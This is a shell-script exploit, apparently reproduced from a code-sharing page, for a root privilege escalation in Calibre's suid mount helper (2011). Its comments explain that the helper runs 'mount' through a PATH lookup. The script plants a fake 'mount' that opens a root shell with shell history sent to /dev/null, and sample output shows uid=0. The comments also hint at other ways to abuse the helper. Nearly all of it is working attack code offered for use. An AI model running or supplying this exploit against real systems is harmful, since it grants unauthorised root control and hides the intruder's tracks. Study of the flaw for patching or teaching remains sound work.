扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 |
#!/bin/sh ####################################### # .50-Calibrer Assault Mount# #by zx2c4 # ####################################### ################################################################################ # Calibre uses a suid mount helper, and like nearly all suid mount helpers that # have come before it, it's badly broken. Let's go through Calibre's faulty code # available at http://pastebin.com/auz9SULi and look at the array of silly # things done, only one of which we actually need to get root. # # In this spot here, we can create a directory owned by root anywhere we want: # # 47 if (!exists(mp)) { # 48 if (mkdir(mp, S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH) != 0) { # 49 errsv = errno; # 50 fprintf(stderr, "Failed to create mount point with error: %s\n", strerror(errsv)); # 51 } # 52 } # # At this point, we can remove any empty directory we want: # # 172 rmd = rmdir(mp); # # And elsewhere, we can create and remove anything_we_want/.some_stupid_marker. # I'm sure you can figure out how to exploit these kinds of things :-P. # # We also get the ability with this wonderful mount-helper to unmount and eject # any device that we want (as root), as well as mount any vfat filesystem that # we'd like. # # Not only that, but we can pass params directly to mount, to some degree: # # 83 execlp("mount", "mount", "-t", "auto", "-o", options, dev, mp, NULL); # # On this line, "dev" and "mp" are controlled by argv[2] and argv[3]. I'm sure # you can find fun things to do with this as well. (There -s and also the man # pages say the last -o is respected, etc etc. Be creative.) # # But there's also something lurking that is way worse in this line. Is that # "execlp" we see? Yes.According to the man pages: # # The execlp(), execvp(), and execvpe() functions duplicate theactionsof # theshellin searchingforanexecutable file if the specified # filename does not contain a slash (/) character. # # execlp searchs PATH for where to find "mount", and then runs it as root. And, # with great joy, we find that we can trivially control PATH by setting it # before running the mount helper. So the attack plan is simple: # #1. Make an executable named "mount" in the current directory that executes # a shell. #2. PATH=".:$PATH" calibre-mount-helper mount something somethingelse # # And that's it! We have root. The below exploit creates things in a temporary # directory that gets cleaned up and displays some status information along the # way. # # - zx2c4 # 2011-11-1 # # Usage: # $ ./50calibrerassaultmount.sh # [+] Making temporary directory: /tmp/tmp.q5ktd8UcxP # [+] Making mount point. # [+] Writing malicious mounter. # [+] Overriding PATH and getting root. # [+] Cleaning up: /tmp/tmp.q5ktd8UcxP # [+] Checking root: uid=0(root) gid=0(root) groups=0(root) # [+] Launching shell. # sh-4.2# # ################################################################################ set -e echo "#######################################" echo "# .50-Calibrer Assault Mount#" echo "#by zx2c4 #" echo "#######################################" echo echo -n "[+] Making temporary directory: " dir="$(mktemp -d)" echo "$dir" cd "$dir" echo "[+] Making mount point." mkdir mountpoint echo "[+] Writing malicious mounter." cat > mount <<END #!/bin/sh cd / echo "[+] Cleaning up: $dir" rm -rf "$dir" echo -n "[+] Checking root: " id echo "[+] Launching shell." HISTFILE="/dev/null" exec /bin/sh END chmod +x mount echo "[+] Overriding PATH and getting root." PATH=".:$PATH" calibre-mount-helper mount /dev/null mountpoint |
体验盒子
